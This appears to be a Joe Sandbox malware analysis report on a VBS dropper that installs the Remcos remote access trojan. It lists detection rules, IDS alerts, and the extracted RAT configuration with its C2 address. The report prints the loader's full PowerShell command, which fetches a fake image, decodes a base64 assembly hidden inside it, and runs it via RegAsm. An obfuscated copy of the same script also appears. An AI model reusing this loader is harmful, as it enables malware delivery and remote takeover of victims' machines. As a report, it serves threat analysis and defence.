#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", ProcessId: 3308, ProcessName: wscript.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home');

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs", ProcessId: 3308, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Suricata Signatures

ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T08:47:03.786188+0200	2020423	1	Exploit Kit Activity Detected	185.199.108.133	443	192.168.2.7	49701	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T08:47:03.786188+0200	2020425	1	Exploit Kit Activity Detected	185.199.108.133	443	192.168.2.7	49701	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T08:46:47.756446+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49983	154.216.18.51	2404	TCP
2024-10-24T08:47:13.088279+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49712	154.216.18.51	2404	TCP
2024-10-24T08:47:22.602331+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49761	154.216.18.51	2404	TCP
2024-10-24T08:47:32.217285+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49810	154.216.18.51	2404	TCP
2024-10-24T08:47:41.706178+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49859	154.216.18.51	2404	TCP
2024-10-24T08:47:51.205328+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49905	154.216.18.51	2404	TCP
2024-10-24T08:48:00.693845+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49958	154.216.18.51	2404	TCP
2024-10-24T08:48:10.219010+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49977	154.216.18.51	2404	TCP
2024-10-24T08:48:19.893680+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49978	154.216.18.51	2404	TCP
2024-10-24T08:48:29.661701+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49979	154.216.18.51	2404	TCP
2024-10-24T08:48:39.444682+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49980	154.216.18.51	2404	TCP
2024-10-24T08:48:48.963788+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49981	154.216.18.51	2404	TCP
2024-10-24T08:48:58.457696+0200	2036594	1	Malware Command and Control Activity Detected	192.168.2.7	49982	154.216.18.51	2404	TCP

ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T08:46:59.611668+0200	2049038	1	A Network Trojan was detected	185.199.108.133	443	192.168.2.7	49699	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T08:47:03.551417+0200	2803305	3	Unknown Traffic	192.168.2.7	49701	185.199.108.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["154.216.18.51:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JX5AIB", "Keylog flag": "", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: scan_doc20241024.vbs	Virustotal: Detection: 17%			Perma Link
Source: scan_doc20241024.vbs	ReversingLabs: Detection: 15%

Yara detected Remcos RAT

Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0042B1E6 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

13_2_0042B1E6

Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_b35eefd7-b

Source: unknown

HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2

Source:

Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_004081F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_004072E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_00407733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	13_2_00414795
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00440A59 FindFirstFileExA,	13_2_00440A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00404CF3 FindFirstFileW,FindNextFileW,	13_2_00404CF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_00405C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_00407FDE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

13_2_0040511A

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49712 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49810 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49761 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49859 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49905 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49958 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49981 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49982 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49980 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49977 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 154.216.18.51:2404
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 185.199.108.133:443 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.199.108.133:443 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.133:443 -> 192.168.2.7:49699

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 154.216.18.51

Source: global traffic

TCP traffic: 192.168.2.7:49712 -> 154.216.18.51:2404

Source: global traffic	HTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1Host: raw.githubusercontent.com

Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox View	IP Address: 185.199.108.133 185.199.108.133

Source: Joe Sandbox View	ASN Name: FASTLYUS FASTLYUS
Source: Joe Sandbox View	ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 185.199.108.133:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
Source: unknown	TCP traffic detected without corresponding DNS query: 185.199.108.133
